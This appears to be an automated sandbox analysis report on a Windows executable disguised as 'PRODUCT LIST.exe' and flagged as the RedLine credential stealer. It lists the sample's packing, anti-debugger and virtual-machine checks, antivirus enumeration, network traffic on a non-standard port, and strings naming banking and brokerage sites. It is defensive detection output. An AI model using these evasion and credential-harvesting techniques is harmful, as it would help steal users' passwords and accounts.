                Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                Source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                Source: PRODUCT LIST.exeStatic PE information: Section: ZLIB complexity 1.0006031709558822
                Source: PRODUCT LIST.exeStatic PE information: Section: .boot ZLIB complexity 0.9948373809878013
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/39@1/1
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeMutant created: NULL
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile created: C:\Users\user\AppData\Local\Temp\tmp826A.tmpJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tmp2E4D.tmp.0.dr, tmp82CD.tmp.0.dr, tmp826A.tmp.0.dr, tmp82AB.tmp.0.dr, tmp829B.tmp.0.dr, tmp82BC.tmp.0.dr, tmp2E4C.tmp.0.dr, tmp827B.tmp.0.dr, tmp2E5F.tmp.0.dr, tmp2E70.tmp.0.dr, tmp2E71.tmp.0.dr, tmp2E5E.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PRODUCT LIST.exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\PRODUCT LIST.exe "C:\Users\user\Desktop\PRODUCT LIST.exe"
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: uxtheme.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: PRODUCT LIST.exeStatic file information: File size 1776640 > 1048576
                Source: PRODUCT LIST.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x1a4200
                Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: PRODUCT LIST.exe, 00000000.00000002.2197239004.0000000000216000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeUnpacked PE file: 0.2.PRODUCT LIST.exe.1f0000.0.unpack :ER; :R; :R;.vm_sec:W;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                Source: PRODUCT LIST.exeStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                Source: PRODUCT LIST.exeStatic PE information: section name:
                Source: PRODUCT LIST.exeStatic PE information: section name:
                Source: PRODUCT LIST.exeStatic PE information: section name:
                Source: PRODUCT LIST.exeStatic PE information: section name: .vm_sec
                Source: PRODUCT LIST.exeStatic PE information: section name: .themida
                Source: PRODUCT LIST.exeStatic PE information: section name: .boot
                Source: PRODUCT LIST.exeStatic PE information: section name: entropy: 7.994326576469916
                Source: PRODUCT LIST.exeStatic PE information: section name: .boot entropy: 7.95802050682975

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49707
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWindow / User API: threadDelayed 1477Jump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWindow / User API: threadDelayed 6539Jump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exe TID: 432Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exe TID: 5384Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exe TID: 6624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: tmp9E5A.tmp.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: tmp9E5A.tmp.0.drBinary or memory string: discord.comVMware20,11696428655f
                Source: tmp9E5A.tmp.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: global block list test formVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: tmp9E5A.tmp.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: tmp9E5A.tmp.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: tmp9E5A.tmp.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: tmp9E5A.tmp.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: tmp9E5A.tmp.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: PRODUCT LIST.exe, 00000000.00000002.2198304415.0000000000F29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: tmp9E5A.tmp.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: tmp9E5A.tmp.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: tmp9E5A.tmp.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: tmp9E5A.tmp.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: tmp9E5A.tmp.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: tmp9E5A.tmp.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: tmp9E5A.tmp.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: tmp9E5A.tmp.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: tmp9E5A.tmp.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: tmp9E5A.tmp.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
